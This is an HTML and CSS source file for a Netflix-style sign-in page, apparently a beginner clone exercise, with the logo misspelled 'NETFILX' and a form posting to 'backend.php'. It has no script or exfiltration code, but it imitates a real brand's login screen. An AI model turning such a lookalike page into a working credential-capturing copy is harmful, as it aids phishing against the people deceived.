<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Netflix</title>
    <link href="https://fonts.cdnfonts.com/css/netflix-font" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css?family=Baloo+Bhai&display=swap" rel="stylesheet">
    <style>
        body {
            background-image: url('https://help.nflxext.com/43e0db2f-fea0-4308-bfb9-09f2a88f6ee4_what_is_netflix_1_en.png');
        }

        .logo {
            color:red;
            font-family: Impact, Haettenschweiler, 'Arial Narrow Bold', sans-serif;
            font-size: 65px;
            margin-top: 0px;
        }

        .container {
           
            height: auto;
            width: 400px;
            background-color:rgba(0, 0, 0, 0.900);
            display: flex;
            margin: 2px auto;
            word-wrap: wrap;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            padding: 20px;
            border-radius: 10px;
            margin-top:50px
        }

        input[type="text"],
        input[type="password"] {

            width: 100%;
            height: 35px;
            padding: 8px 10px;
            margin: 10px 0px;
            background-color:rgb(31, 29, 29);
            color: white;
            font-size: 15px;
            border-radius: 6px;
            box-sizing: border-box;

        }

        .container h2 {
            color: white;
            font-size: 35px;
            font-family:'baloo bhai', sans-serif;
            text-align: left;
            margin-bottom:5px;
            margin-left:30px;
            margin-top: 60px;
        
        }

        .btn {
            width: 82%;
            height: 38px;
            padding: 8px 10px;
            margin: 10px 0px;
            background-color: red;
            font-size: 18px;
            text-align: center;
            cursor: pointer;
            font-family: 'baloo bhai',sans-serif;
            border-radius: 12px;
            color: white;
        }

        .btn:hover {
            text-decoration: underline;
            background-color: beige;
            color: black;
        }
        #savepass{
            margin: 10px 0;


        }
        .cbox label{
            color:grey;
            margin:-4px 0px;
            font-size: 15px;
            font-family:system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
            
        }
        .help a{
            color: grey;
            text-align: center;
            font-size: 15px;
        }
        h3{
            margin:40px 12px;
            margin-left:30px;
            color:grey;
            font-size: 12px;
            font-family:system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
            
        }
        h3 a{
            text-decoration: none;
            color: white;
        }
        h4{
            color:grey;
            margin-top:-30px;
            margin-left:30px;
            font-size: 12px;
        }
      


        
    </style>
</head>

<body>
    <h1 class="logo">NETFILX</h1>
    <div class="container">
        <h2>Sign in</h2>
        <form action="backend.php">
            <div class="data">
                <input type="text" placeholder="Email or Phone: ">
            </div>
            <div class="data">
                <input type="password" placeholder="Password">
            </div>
            <div>
                <button class="btn">Sign in</button>
            </div>
        </form>
        <span class="cbox">
            <label for="remember me">Remember me</label>
            <input type="checkbox" name="remember me " id="savepass"checked>
        </span>
        <span class="help">
            <a href="https://www.netflix.com/in/LoginHelp">Need help?</a>
        </span>
        <div class="new">
        <h3>New to Netflix?<a href="https://www.netflix.com/in/">Sign up now</a></h3>
        <h4>Sign in is protected by Google reCAPTCHA to ensure you’re not a bot.</h4>
    </div>
    </div>


</body>

</html>